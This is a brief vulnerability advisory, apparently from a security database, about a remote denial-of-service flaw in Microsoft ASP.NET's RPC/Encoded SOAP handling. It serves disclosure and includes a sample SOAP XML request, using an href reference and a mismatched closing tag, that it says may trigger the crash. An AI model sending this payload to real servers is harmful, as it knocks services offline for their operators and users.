|
Microsoft ASP.NET RPC/Encoded Remote Denial Of Service Vulnerability
An exploit is not required. The following XML request is an example of a request that may trigger this vulnerability: <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <tns:Test> <someList href="#id1" /> </tns:Test> <tns:ArrayOfInt> <Item>0</Item> </tns:ArrayOfint> </soap:Body> </soap:Envelope> |
|
|
Privacy Statement |
